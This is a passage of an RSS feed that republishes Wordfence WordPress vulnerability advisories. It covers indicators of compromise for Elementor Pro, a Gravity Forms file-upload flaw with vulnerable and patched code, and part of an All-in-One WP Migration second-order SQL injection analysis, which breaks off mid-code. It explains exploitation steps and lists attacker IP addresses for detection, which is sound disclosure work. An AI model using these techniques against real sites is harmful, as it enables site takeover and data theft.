<h2>Indicators of Compromise</h2>
<p>A successful attack results in an executable PHP file being written to the <code>/wp-content/uploads/elementor/forms/</code> directory. This directory is only intended to store uploaded form submissions and should never contain PHP files, so the presence of any .php file in this location is a strong indicator of compromise. We recommend reviewing this directory.</p>
<p>We also recommend reviewing your web server access logs for requests to <code>/wp-admin/admin-ajax.php</code> with the action parameter set to <code>elementor_pro_forms_send_form</code>, especially those originating from the following IP addresses:</p>
<ul>
<li>2602:fa59:10:7a1::1</li>
<li>185.196.220.85</li>
<li>103.84.230.85</li>
<li>103.90.148.202</li>
<li>216.126.225.208</li>
<li>167.254.240.75</li>
<li>167.254.241.119</li>
<li>114.10.17.253</li>
<li>114.10.45.151</li>
<li>2406:ef80:2:7d19::1</li>
</ul>
<p>If you find evidence of compromise, we recommend removing any unexpected files and reviewing the site for backdoors. The absence of any such log entries does not guarantee that your website has not been compromised.</p>
<h2>Conclusion</h2>
<p>In today’s article, we covered the attack data for a critical-severity Unauthenticated Arbitrary File Upload vulnerability in the <a href="https://elementor.com/pro/" target="_blank" rel="noopener">Elementor Pro plugin</a> that allows unauthenticated threat actors to upload executable PHP files and achieve remote code execution, leading to complete site compromise. Our threat intelligence indicates that attackers began targeting this vulnerability the same day it was disclosed, on August 19th, 2026, with the heaviest activity occurring between August 19th and 23rd. The Wordfence firewall has already blocked over 190,000 exploit attempts targeting this vulnerability.</p>
<p>All Wordfence users, including those running <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a>, as well as sites running the free version of Wordfence, are protected against this vulnerability by the Wordfence firewall’s built-in Malicious File Upload protection.</p>
<p>Even if you are protected by the Wordfence firewall, we urge you to ensure that your site is updated to at least version 4.2.2 in order to maintain normal functionality. If you have friends or colleagues using <a href="https://elementor.com/pro/" target="_blank" rel="noopener">Elementor Pro</a>, be sure to forward this advisory to them, as sites could still be unprotected and unpatched.</p>
<p>If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>. If you need your site cleaned immediately, <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/attackers-actively-exploiting-critical-vulnerability-in-elementor-pro-plugin/" target="_blank" rel="noopener">Attackers Actively Exploiting Critical Vulnerability in Elementor Pro Plugin</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Argus Finds Unauthenticated Arbitrary File Upload Vulnerability in Gravity Forms</title>
		<link>https://swiftupdates.ca/wordfence-argus-finds-unauthenticated-arbitrary-file-upload-vulnerability-in-gravity-forms/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Tue, 01 Sep 2026 19:39:22 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-argus-finds-unauthenticated-arbitrary-file-upload-vulnerability-in-gravity-forms/</guid>

					<description><![CDATA[On August 9th, 2026, Wordfence Argus, created by the Wordfence Threat Intelligence team, discovered an Arbitrary File Upload vulnerability in Gravity Forms, a WordPress plugin estimated to have more than one million active installations. This high-severity vulnerability makes it possible for unauthenticated threat actors to write files with attacker-selected extensions to a public temporary upload [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On August 9th, 2026, Wordfence Argus, created by the Wordfence Threat Intelligence team, discovered an Arbitrary File Upload vulnerability in Gravity Forms, a WordPress plugin estimated to have more than one million active installations. This high-severity vulnerability makes it possible for unauthenticated threat actors to write files with attacker-selected extensions to a public temporary upload directory. This can lead to remote code execution.</p>
<p>We discovered this vulnerability with the help of <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a>, which we covered in a <a href="https://www.wordfence.com/blog/2026/08/wordfence-argus-finds-complex-6-step-critical-rce-in-avada-theme-with-1-million-sales/" target="_blank" rel="noopener">separate post</a>. Our mission is to secure WordPress through defense in depth, which is why we invest in quality vulnerability research and work closely with plugin vendors to ensure vulnerabilities are addressed before they can be widely exploited. We are committed to making the WordPress ecosystem more secure through the detection and prevention of vulnerabilities, which is a critical element of a multi-layered approach to security.</p>
<p>We provided full disclosure details to the Gravity Forms team through our <a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener">Wordfence Vulnerability Management Portal</a> on August 11, 2026. The developer acknowledged the report on August 20, 2026, and released Gravity Forms 3.0.3 with the patch the same day. We would like to commend the Gravity Forms team for their response and remediation of this issue.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> customers received a firewall rule to provide protection against known exploitation techniques on August 13, 2026. Free users will receive the same rule 30 days later, on September 12, 2026.</p>
<p>We urge users to update their sites to Gravity Forms 3.0.3 or a newer version as soon as possible.</p>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d20b2d00-054e-4772-a5a5-b7b33063043c" target="_blank" rel="noopener">Gravity Forms &lt;= 3.0.2 &#8211; Unauthenticated Arbitrary File Upload via State/Chunk Hash Confusion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19513" target="_blank" rel="noopener noreferrer">							CVE-2026-19513						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>&lt;= 3.0.2</strong>
									</div>
<div class="patched-status">
					<span>Patched Version</span><br />
					<strong class="patched">3.0.3</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gravityforms" target="_blank" rel="noopener">Gravity Forms</a> <span class="wfvr-software-slug">[gravityforms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01c3929fe6b851d3cf7bda3c0215f691.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01c3929fe6b851d3cf7bda3c0215f691"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener">Alex Thomas</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The Gravity Forms plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 3.0.2. This is due to insufficient validation of multi-file upload chunk state in the `GFAsyncUpload::upload()` function, where public form state URL hashes can be reused as chunk continuation hashes and attacker-controlled temporary filenames are accepted before sanitization. This makes it possible for unauthenticated attackers, when a public form contains a File Upload field with Multiple Files enabled, to upload a valid PNG/PDF polyglot to an attacker-selected public `.php` or `.html` filename in the Gravity Forms temporary upload directory. This can lead to remote code execution on WordPress systems that use NGINX or other non `.htaccess` respecting web servers. NOTE: During installation and activation, the Gravity Forms plugin places a `.htaccess` file in this directory, which prevents this vulnerability from being exploited despite the PHP file being written to the temporary upload directory. In these cases where PHP execution is blocked, attacker-written HTML can result in stored same-origin cross-site scripting if a victim visits the generated file URL.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d20b2d00-054e-4772-a5a5-b7b33063043c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>Technical Analysis</h2>
<p>Gravity Forms includes a multi-file upload endpoint that supports chunked upload requests. A continuation request identifies the temporary file and supplies a state intended to associate it with a previous chunk number, form, field, and uploaded filename. Gravity Forms 3.0.2 attempted to authenticate those values with a WordPress hash.</p>
<p>Unfortunately, the implementation used the same <code>wp_hash()</code> operation for two unrelated security contexts. Public form state includes a hash of the current page URL in <code>includes/form-display/state/class-state-handler.php</code>:</p>
<pre class="brush: php; first-line: 156; title: ; notranslate">
private function add_url( $form_id ) {
	$url = $this-&gt;get_url();
	if ( str_contains( $url, '?' ) ) {
		$values = array(
			wp_hash( $url ),
			wp_hash( strtok( $url, '?' ) ),
		);
		$this-&gt;add_hashes( $form_id, 'url', $values );
	} else {
		$this-&gt;add_hashes( $form_id, 'url', wp_hash( $url ) );
	}
}
</pre>
<p>The chunk uploader used <code>wp_hash()</code> again, without a context-specific prefix, to authenticate a pipe-delimited set of continuation values in <code>includes/upload.php</code>:</p>
<pre class="brush: php; first-line: 427; title: ; notranslate">
private static function get_chunk_hash( $tmp_file_name, $chunk, $form_id, $field_id, $uploaded_filename ) {
	return wp_hash(
		implode(
			'|',
			array(
				$tmp_file_name,
				$chunk,
				$form_id,
				$field_id,
				$uploaded_filename,
			)
		)
	);
}
</pre>
<p>Because the public page URL is attacker-influenced, an unauthenticated attacker can request a URL whose value matches a chosen serialization of the chunk fields. The resulting URL hash from the public form state is then also a valid chunk-continuation hash. This is a cryptographic domain-confusion issue: the attacker does not need to recover the site’s secret or forge a new hash, but instead reuses a legitimate hash generated for a different purpose.</p>
<p>The impact is compounded by how <code>GFAsyncUpload::upload()</code> handles the supplied continuation state. In Gravity Forms 3.0.2, the handler verifies the hash over the raw, attacker-controlled <code>temp_filename</code>, assigns that value as the destination name, and only then passes it through <code>sanitize_file_name()</code>:</p>
<pre class="brush: php; first-line: 110; title: ; notranslate">
$chunk         = isset( $_REQUEST['chunk'] ) ? intval( $_REQUEST['chunk'] ) : 0;
$chunks        = isset( $_REQUEST['chunks'] ) ? intval( $_REQUEST['chunks'] ) : 0;
$chunk_data    = $chunks &amp;&amp; $file_name ? rgar( $_REQUEST, str_replace( '.', '_', $file_name ) ) : array();
$tmp_file_name = '';

if ( $chunk ) {
	if ( empty( $chunk_data['hash'] ) || ( $chunk_data['hash'] !== self::get_chunk_hash( $chunk_data['temp_filename'], ( $chunk - 1 ), $form_id, $field_id, $uploaded_filename ) ) ) {
		GFCommon::log_debug( __METHOD__ . sprintf( '(): Invalid hash for chunk #%d.', $chunk ) );
		self::die_error( 105, __( 'Upload unsuccessful', 'gravityforms' ) . ' ' . $uploaded_filename );
	}
	$tmp_file_name = $chunk_data['temp_filename'];
}

if ( empty( $tmp_file_name ) ) {
	$tmp_file_name = $form_unique_id . '_input_' . $field_id . '_' . GFCommon::random_str( 16 ) . '_' . $file_name;
}

$tmp_file_name = sanitize_file_name( $tmp_file_name );
$file_path     = $target_dir . $tmp_file_name;
</pre>
<p>The plugin validates the apparent upload names against the field’s allowed file types, but the temporary destination basename is handled separately. An attacker can therefore provide a normal, permitted carrier name such as <code>safe.png</code> while causing the sanitized temporary destination to end in <code>.php</code>. A valid PNG/PHP polyglot (a single file structured to be valid in two or more different file formats) satisfies the image content checks while retaining embedded PHP code that could be executed by the web server.</p>
<p>The continuation path also does not require a server-created first chunk. For a nonzero chunk, the handler opens the selected <code>.part</code> path in append mode, which creates the file if it does not already exist:</p>
<pre class="brush: php; first-line: 172; title: ; notranslate">
$out = @fopen( "{$file_path}.part", $chunk == 0 ? 'wb' : 'ab' );
</pre>
<p>If the request identifies itself as the final chunk, the plugin immediately removes the <code>.part</code> suffix:</p>
<pre class="brush: php; first-line: 216; title: ; notranslate">
if ( ! $chunks || $chunk == $chunks - 1 ) {
	// Upload is complete. Strip the temp .part suffix off
	rename( "{$file_path}.part", $file_path );
</pre>
<p>An attacker can exploit this issue when a public form contains a File Upload field with the Multiple Files option enabled. Gravity Forms and WordPress permit PNG and PDF uploads by default, so exploitation does not require an administrator to add either type to a custom allowlist. This allows for an unauthenticated public file write with an attacker-selected extension in the Gravity Forms temporary upload directory.</p>
<p>The final impact depends on the server configuration. Gravity Forms creates an upload-root <code>.htaccess</code> file with directives that disable PHP parsing on typical Apache configurations. NGINX does not process <code>.htaccess</code>. On servers that execute PHP in the directory, the write can lead to remote code execution. On servers where an effective <code>.htaccess</code> prevents PHP execution, an attacker can alternatively write a <code>.html</code> file, which can result in same-origin cross-site scripting if a victim visits the generated URL.</p>
<h2>The Patch</h2>
<p>The Gravity Forms team addressed this issue in version 3.0.3 by making temporary upload names server-generated and by requiring continuation chunks to present authenticated server-created state. The upload handler now generates a random temporary basename using only the permitted extension, validates the signed state before continuing an upload, and verifies that the expected partial file exists at the exact signed byte offset:</p>
<pre class="brush: php; first-line: 121; title: ; notranslate">
if ( $chunks &amp;&amp; $chunk ) {
	$submitted_tmp_file_name = rgar( $chunk_data, 'temp_filename' );
	$chunk_state             = self::decode_chunk_token( rgar( $chunk_data, 'hash' ) );

	if ( ! self::is_valid_chunk_state( $chunk_state, $submitted_tmp_file_name, $chunk, $form_id, $field_id, $chunks, $uploaded_filename ) ) {
		GFCommon::log_debug( __METHOD__ . sprintf( '(): Invalid hash for chunk #%d.', $chunk ) );
		self::die_error( 105, __( 'Upload unsuccessful', 'gravityforms' ) . ' ' . $uploaded_filename );
	}

	$tmp_file_name = $chunk_state['temp_filename'];
	$write_offset  = $chunk_state['offset'];
}

if ( empty( $tmp_file_name ) ) {
	$tmp_file_name = 'gf_' . GFCommon::random_str( 32 ) . '.' . pathinfo( $file_name, PATHINFO_EXTENSION );
}

$tmp_file_name = sanitize_file_name( $tmp_file_name );
if ( ! self::is_valid_temp_filename( $tmp_file_name ) ) {
	self::die_error( 105, __( 'Upload unsuccessful', 'gravityforms' ) . ' ' . $uploaded_filename );
}

$file_path = $target_dir . $tmp_file_name;
if ( $chunks &amp;&amp; $chunk &amp;&amp; ( ! file_exists( "{$file_path}.part" ) || filesize( "{$file_path}.part" ) !== $write_offset ) ) {
	self::die_error( 105, __( 'Upload unsuccessful', 'gravityforms' ) . ' ' . $uploaded_filename );
}
</pre>
<p>Version 3.0.3 also replaces the ambiguous <code>wp_hash()</code> value with a structured, domain-separated HMAC token. The token binds the server-generated temporary filename to the next chunk number, form and field IDs, original filename, current byte offset, and total chunk count:</p>
<pre class="brush: php; first-line: 466; title: ; notranslate">
private static function get_chunk_hash( $tmp_file_name, $chunk, $form_id, $field_id, $uploaded_filename, $offset, $chunks ) {
	$payload = wp_json_encode(
		array(
			'temp_filename'     =&gt; (string) $tmp_file_name,
			'next_chunk'        =&gt; (int) $chunk,
			'form_id'           =&gt; (int) $form_id,
			'field_id'          =&gt; (int) $field_id,
			'uploaded_filename' =&gt; (string) $uploaded_filename,
			'offset'            =&gt; (int) $offset,
			'total_chunks'      =&gt; (int) $chunks,
		)
	);

	$encoded_payload = rtrim( strtr( base64_encode( $payload ), '+/', '-_' ), '=' );

	return $encoded_payload . '.' . hash_hmac( 'sha256', 'gravityforms-upload-chunk-v1|' . $encoded_payload, wp_salt( 'auth' ) );
}
</pre>
<p>Finally, the patched code rejects non-canonical temporary basenames and any temporary filename with a disallowed extension:</p>
<pre class="brush: php; first-line: 521; title: ; notranslate">
private static function is_valid_temp_filename( $tmp_file_name ) {
	if ( ! is_string( $tmp_file_name ) || $tmp_file_name === '' ) {
		return false;
	}

	if ( sanitize_file_name( $tmp_file_name ) !== $tmp_file_name ) {
		return false;
	}

	if ( wp_basename( $tmp_file_name ) !== $tmp_file_name ) {
		return false;
	}

	if ( GFCommon::file_name_has_disallowed_extension( $tmp_file_name ) ) {
		return false;
	}

	return true;
}
</pre>
<p>These changes prevent a public form-state hash from authenticating upload continuation state, remove attacker control over the destination basename, and ensure that a continuation request belongs to an upload session actually created by the server. Gravity Forms lists version 3.0.3 as released on August 20, 2026, with security enhancements in its <a href="https://docs.gravityforms.com/gravityforms-change-log/" target="_blank" rel="noopener">official changelog</a>.</p>
<h2>Wordfence Firewall</h2>
<p>The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.</p>
<p><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/gravity-forms-upload-wordfence-firewall-polished.png" alt="Diagram showing the Wordfence Firewall blocking an unauthenticated malicious Gravity Forms file upload request" width="1197" height="726" class="alignnone size-full"></p>
<h2>Disclosure Timeline</h2>
<div>
<div>
<div>2026-08-09</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We discovered the vulnerability</div>
<div>During internal research with Wordfence Argus, we discovered an unauthenticated Arbitrary File Upload vulnerability in Gravity Forms.</div>
</div>
</div>
<div>
<div>2026-08-11</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>We validated the report and disclosed it to the vendor</div>
<div>Our team confirmed the proof of concept and sent full disclosure details to the Gravity Forms team through the Wordfence Vulnerability Management Portal.</div>
</div>
</div>
<div>
<div>2026-08-13</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Wordfence Premium, Care, and Response users received a firewall rule</div>
<div>We released a firewall rule protecting Wordfence Premium, Care, and Response customers against known exploitation techniques.</div>
</div>
</div>
<div>
<div>2026-08-20</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Vendor acknowledged the report</div>
<div>The Gravity Forms team acknowledged the report.</div>
</div>
</div>
<div>
<div>2026-08-20</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Patched version released</div>
<div>Gravity Forms 3.0.3, the first version containing the complete patch, was released.</div>
</div>
</div>
<div>
<div>2026-09-12</div>
<div>
            <span></span><br />
            <span></span>
        </div>
<div>
<div>Wordfence free users receive the firewall rule</div>
<div>Sites running the free version of Wordfence receive the same firewall rule 30 days after the Premium release.</div>
</div>
</div>
</div>
<div>
    <span><i></i> Wordfence action</span><br />
    <span><i></i> Vendor / external action</span>
</div>
<h2>Conclusion</h2>
<p>In this blog post, we detailed an Arbitrary File Upload vulnerability in the Gravity Forms plugin affecting versions 3.0.2 and earlier. On sites with a public form containing a multi-file upload field, unauthenticated threat actors can write a valid image/PHP polyglot to a public temporary upload path with an attacker-selected <code>.php</code> extension. Where the server executes PHP in that directory, this can result in remote code execution.</p>
<p>The vulnerability has been addressed in Gravity Forms 3.0.3. We encourage WordPress users to verify that their sites are running version 3.0.3 or newer as soon as possible due to the high severity of this vulnerability.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against exploits targeting this vulnerability on August 13, 2026. Sites using the free version of Wordfence will receive the same protection on September 12, 2026.</p>
<p>If you know someone who uses Gravity Forms on their site, we recommend sharing this advisory with them to help ensure their site remains secure.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/wordfence-argus-finds-unauthenticated-arbitrary-file-upload-vulnerability-in-gravity-forms/" target="_blank" rel="noopener">Wordfence Argus Finds Unauthenticated Arbitrary File Upload Vulnerability in Gravity Forms</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>5 Million WordPress Sites Affected by SQL Injection Vulnerability in All-in-One WP Migration and Backup WordPress Plugin</title>
		<link>https://swiftupdates.ca/5-million-wordpress-sites-affected-by-sql-injection-vulnerability-in-all-in-one-wp-migration-and-backup-wordpress-plugin/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Tue, 01 Sep 2026 15:39:35 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/5-million-wordpress-sites-affected-by-sql-injection-vulnerability-in-all-in-one-wp-migration-and-backup-wordpress-plugin/</guid>

					<description><![CDATA[On August 14th, 2026, we received a submission for an Unauthenticated Second-Order SQL Injection vulnerability in All-in-One WP Migration and Backup, a WordPress plugin with more than 5 million active installations. This vulnerability makes it possible for unauthenticated attackers to inject SQL that is later executed when a site administrator performs an archive restore, which [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On August 14th, 2026, we received a submission for an Unauthenticated Second-Order SQL Injection vulnerability in <a href="https://wordpress.org/plugins/all-in-one-wp-migration/" target="_blank" rel="noopener">All-in-One WP Migration and Backup</a>, a WordPress plugin with more than 5 million active installations. This vulnerability makes it possible for unauthenticated attackers to inject SQL that is later executed when a site administrator performs an archive restore, which can be used to leak the plugin’s secret key and ultimately achieve remote code execution, leading to complete site takeover.</p>
<p>Props to <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jack-taylor" target="_blank" rel="noopener">Jack Taylor</a> who discovered and responsibly reported this vulnerability through the Wordfence <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a>. This researcher earned a bounty of $6,400.00 for this discovery. Our mission is to secure WordPress through defense in depth, which is why we are investing in quality vulnerability research and collaborating with researchers of this caliber through our Bug Bounty Program. We are committed to making the WordPress ecosystem more secure through the detection and prevention of vulnerabilities, which is a critical element to the multi-layered approach to security.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability in All-in-One WP Migration and Backup, hosted on WordPress.org, on August 16, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on September 15, 2026.</p>
<p>We provided full disclosure details to the ServMask team through our <a href="https://www.wordfence.com/threat-intel/vendor/vulnerability-management-portal/" target="_blank" rel="noopener">Wordfence Vulnerability Management Portal</a> on August 15, 2026. The developer acknowledged the report on August 17, 2026, and released the fully patched version on August 20, 2026. We would like to commend the ServMask team for their prompt response and timely patch.</p>
<p>We urge users to update their sites to the latest patched version of All-in-One WP Migration and Backup, version 7.110 at the time of this publication, as soon as possible.</p>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22e273d9-a268-4dc5-b1f6-3bc5c29232c5" target="_blank" rel="noopener">All-in-One WP Migration and Backup &lt;= 7.109 &#8211; Unauthenticated Second-Order SQL Injection via Archive Restore to Remote Code Execution</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19949" target="_blank" rel="noopener noreferrer">							CVE-2026-19949						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>&lt;= 7.109</strong>
									</div>
<div class="patched-status">
					<span>Patched Version</span><br />
					<strong class="patched">7.110</strong>
				</div>
<div class="bounty">
					<span>Bounty</span><br />
					<strong>$5,761.00</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-migration" target="_blank" rel="noopener">All-in-One WP Migration and Backup</a> <span class="wfvr-software-slug">[all-in-one-wp-migration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jack-taylor" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cd164c6348ca2048a891d26c4106e94a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd164c6348ca2048a891d26c4106e94a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jack-taylor" target="_blank" rel="noopener">Jack Taylor</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to SQL Injection via archive restore functionality in all versions up to, and including, 7.109 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This can be leveraged to obtain the ai1wm_secret_key when a site administrator performs an archive restore and achieve remote code execution once able to leverage the ai1wm_secret_key value.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22e273d9-a268-4dc5-b1f6-3bc5c29232c5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>Technical Analysis</h2>
<p>All-in-One WP Migration and Backup is a popular WordPress plugin for creating backups and migrating sites. It packages a site into a proprietary <code>.wpress</code> archive containing the site’s files and a database dump, and restores that archive on a destination server. During import, the plugin rewrites source URLs and database table prefixes inside each SQL statement before executing them. The plugin’s unauthenticated import action is protected by a secret key stored in the <code>ai1wm_secret_key</code> option, and the plugin deliberately saves and restores this option around each database-restore pass so that it is not overwritten by the imported data.</p>
<p>This vulnerability is a second-order SQL injection, meaning the malicious input is stored during one action and only becomes dangerous when it is processed later during a different action.</p>
<p>The malicious input is planted through WordPress core’s trackback functionality, which does not require authentication. An unauthenticated attacker submits two trackbacks to a public post that accepts pings. In each trackback, the blog name ends with a trailing backslash and the URL carries a crafted payload. WordPress core stores these values in the comments table as the comment author and comment author URL without stripping the backslash or rejecting the URL.</p>
<p>The data only becomes dangerous once a site administrator exports and then imports the site, which is a normal operation for this backup and migration plugin. During import, the plugin rewrites URLs and table prefixes in the stored SQL using the <code>replace_table_values()</code> function in the <code>Ai1wm_Database</code> class, which relies on a regular expression to identify quoted string literals:</p>
<pre class="brush: php; first-line: 1634; title: ; notranslate">// Replace serialized values
foreach ( $this-&gt;get_old_replace_values() as $old_value ) {
	if ( strpos( $input, $this-&gt;escape( $old_value ) ) !== false ) {
		$input = preg_replace_callback( "/'(.*?)(?&lt;!\\)'/S", array( $this, 'replace_table_values_callback' ), $input );
		break;
	}
}</pre>
<p>The critical flaw is in the regular expression used to match string literals. The negative lookbehind only checks the single byte immediately before a closing quote, rather than counting the full run of backslashes preceding it. A closing quote preceded by two backslashes represents an even-length run, which is the true end of the string, but the regex treats it as an escaped quote and continues matching into the following literal. This is why the planted trailing backslash matters: after the exporter has correctly doubled it, the regex misinterprets the string boundary.</p>
<p>The matched value is then passed to the <code>replace_table_values_callback()</code> function, which unescapes the over-captured match, performs the URL replacement, and re-escapes the result:</p>
<pre class="brush: php; first-line: 1726; title: ; notranslate">protected function replace_table_values_callback( $matches ) {
	// Unescape MySQL special characters
	$matches[1] = Ai1wm_Database_Utility::unescape_mysql( $matches[1] );
 
	// Replace serialized values
	if ( strlen( $matches[1] ) &gt;= $this-&gt;get_old_replace_values_min_length() ) {
		$matches[1] = Ai1wm_Database_Utility::replace_serialized_values( $matches[1], $this-&gt;get_old_replace_values(), $this-&gt;get_new_replace_values() );
	}
 
	// Escape MySQL special characters
	$matches[1] = Ai1wm_Database_Utility::escape_mysql( $matches[1] );
 
	return "'" . $matches[1] . "'";
}</pre>
<p>Because the value was over-captured due to the boundary confusion, this unescape-replace-re-escape cycle produces an unbalanced sequence of backslashes that flips the MySQL string boundary in the resulting SQL statement. The attacker-controlled portion of the stored comment is thereby promoted from data inside a string literal to executable SQL, which is run against the database during the restore.</p>
<p>The two planted rows work together. The first is designed to exceed the import pipeline’s time budget, which causes the restore to pause and commit the current transaction while recording its position in the file so that processing continues on a subsequent pass. Because the plugin restores the destination site’s <code>ai1wm_secret_key</code> into the options table at each pass boundary, the real secret key is present by the time the second row is processed. The second row’s payload reads the <code>ai1wm_secret_key</code> value out of the options table and writes it into the comment, marking the comment as approved so that it becomes publicly visible.</p>
<p>At this point, the attacker can simply read the leaked secret key from the site’s public comments REST API endpoint, with no authentication required.</p>
<p>Finally, the attacker leverages the leaked secret key to drive the plugin’s import action directly. The import controller is registered for unauthenticated access, and the only gate protecting it is a secret-key comparison:</p>
<pre class="brush: php; first-line: 38; title: ; notranslate">public static function import( $params = array() ) {
	global $ai1wm_params;
 
	// Set params
	if ( empty( $params ) ) {
		$params = stripslashes_deep( array_merge( $_GET, $_POST ) );
	}
 
	// Set priority
	if ( ! isset( $params['priority'] ) ) {
